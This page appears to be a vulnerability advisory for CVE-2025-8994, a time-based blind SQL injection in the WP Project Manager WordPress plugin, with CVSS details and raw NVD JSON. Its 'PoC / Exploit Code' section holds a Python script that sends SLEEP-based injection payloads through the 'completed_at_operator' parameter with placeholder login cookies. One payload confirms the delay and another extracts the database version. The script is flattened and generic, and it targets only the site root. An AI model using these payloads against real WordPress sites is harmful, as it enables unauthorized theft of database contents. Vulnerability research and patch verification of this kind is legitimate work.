Security Vulnerability Report
中文
CVE-2025-8994 CVSS 6.5 MEDIUM

CVE-2025-8994

Published: 2025-11-15 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Project Management, Team Collaboration, Kanban Board, Gantt Charts, Task Manager and More – WP Project Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘completed_at_operator’ parameter in all versions up to, and including, 2.6.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WP Project Manager <= 2.6.26

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target_url = "http://target-wordpress-site.com/" # Verify authentication by checking cookies or using valid WordPress credentials cookies = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_user": "user_id|expiration|token|hmac" } # Time-based blind SQL injection via completed_at_operator parameter # This PoC demonstrates the vulnerability by injecting a SLEEP() function injection_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))test) AND '1'='1" params = { "completed_at_operator": injection_payload } print("[*] Sending SQL injection payload...") print(f"[*] Target: {target_url}") print(f"[*] Payload: {injection_payload}") start_time = time.time() response = requests.get( target_url, params=params, cookies=cookies, timeout=30 ) end_time = time.time() response_time = end_time - start_time print(f"[*] Response time: {response_time} seconds") if response_time >= 5: print("[!] Vulnerability confirmed! Server response delayed by ~5 seconds") else: print("[*] No obvious delay detected") # Example: Extracting database version using time-based injection db_version_payload = "1' AND (SELECT CASE WHEN (SUBSTRING((SELECT version()),1,1)='5') THEN SLEEP(5) ELSE 0 END) AND '1'='1" print(f"[*] Testing database version extraction...")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-8994", "sourceIdentifier": "[email protected]", "published": "2025-11-15T06:15:43.980", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Project Management, Team Collaboration, Kanban Board, Gantt Charts, Task Manager and More – WP Project Manager plugin for WordPress is vulnerable to time-based SQL Injection via the ‘completed_at_operator’ parameter in all versions up to, and including, 2.6.26 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wedevs-project-manager/tags/2.6.24/src/Task/Helper/Task.php#L1484", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3386164/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/74984cc6-06b1-4c3a-a3e6-9e104c71e9c5?source=cve", "source": "[email protected]"}]}}